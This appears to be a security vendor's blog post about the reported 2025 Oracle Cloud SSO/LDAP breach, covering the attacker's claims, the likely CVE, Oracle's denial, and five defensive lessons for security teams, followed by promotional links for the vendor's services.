The breach reportedly affects over 140,000 Oracle tenants, raising critical concerns about trust and security in modern cloud-based supply chains.
Introduction
On March 21, 2025, CloudSEK’s XVigil platform discovered that a threat actor using the alias “rose87168” was offering 6 million exfiltrated records for sale, allegedly stolen from Oracle Cloud’s SSO and LDAP systems. This supply chain breach has impacted over 140,000 tenants, triggering urgent questions about the security posture of cloud service providers and the organizations that rely on them.
What Happened
The attacker reportedly gained unauthorized access to the subdomain login.us2.oraclecloud.com, which hosted Oracle Fusion Middleware 11G. The vulnerability likely exploited was CVE-2021-35587, a known remote code execution flaw in Oracle Access Manager that enables unauthenticated access.
What was stolen:
.jksfiles (Java KeyStores) and encrypted SSO credentials- Private key files (
ewallet.p12,cwallet.sso) - LDAP and identity configurations
- Enterprise Manager’s JPS and credential vault content
The attacker even offered rewards to anyone who could crack these passwords — a worrying sign of coordinated underground activity.
Oracle’s Response vs. Independent Findings
Oracle denied any breach. According to their statement:
“There has been no breach in Oracle Cloud. The credentials posted do not match Oracle Cloud infrastructure or customer data.”
However, CloudSEK and Hudson Rock both conducted forensic analysis of the leaked data and found that it appears genuine and connected to production environments. These findings strongly suggest that the breach was real — even if Oracle is unwilling to confirm it publicly.
5 Critical Lessons for Security Teams
1. Audit Your Vendors Regularly
Relying on third-party cloud providers? Then you must conduct ongoing risk assessments. Verify certifications like SOC 2, ISO 27001, and require clear incident response plans.
2. Enforce Strong Identity Controls
Enable Multi-Factor Authentication (MFA) across all accounts, especially those accessing cloud infrastructure. It adds a critical layer of protection if credentials are leaked.
3. Monitor Continuously
Use SIEM, EDR, and threat intelligence platforms to detect abnormal activity in real-time. Early detection = faster containment.
4. Segment Your Cloud Access
Apply least privilege principles and network segmentation. Prevent lateral movement between accounts, services, and environments.
5. Prepare a Breach Response Playbook
When a breach happens, speed and coordination are everything. Have a documented IR plan, defined roles, and communication strategy in place.
Final Thoughts
The Oracle Cloud breach of 2025 is a stark reminder that cloud doesn’t mean secure by default. Even industry giants can fall victim to vulnerabilities — often cascading to hundreds of thousands of customers.
At Krixo.io, we help organizations protect their digital supply chains through advanced risk assessments, real-time monitoring, and cloud security consulting.
Free evaluation
Find out if your domain has been compromised and receive a detailed report so you can take immediate action.
Final Thoughts
The Oracle Cloud breach of 2025 is a stark reminder that cloud doesn’t mean secure by default. Even industry giants can fall victim to vulnerabilities — often cascading to hundreds of thousands of customers.
At Krixo.io, we help organizations protect their digital supply chains through advanced risk assessments, real-time monitoring, and cloud security consulting.
✅ Is Your Business Secure?
🔐 Request a Free Security Risk Assessment from Krixo.io
👉 https://krixo.io/contact
📘 Free Download: “10 Steps to Secure Your Cloud Supply Chain”
👉 https://krixo.io/ebook-supplychain-security
📬 Subscribe to Our Threat Intelligence Briefing
👉 https://krixo.io/newsletter
🔎 Related Reading
🧠 How to Mitigate Third-Party Cloud Risks
🌐 References: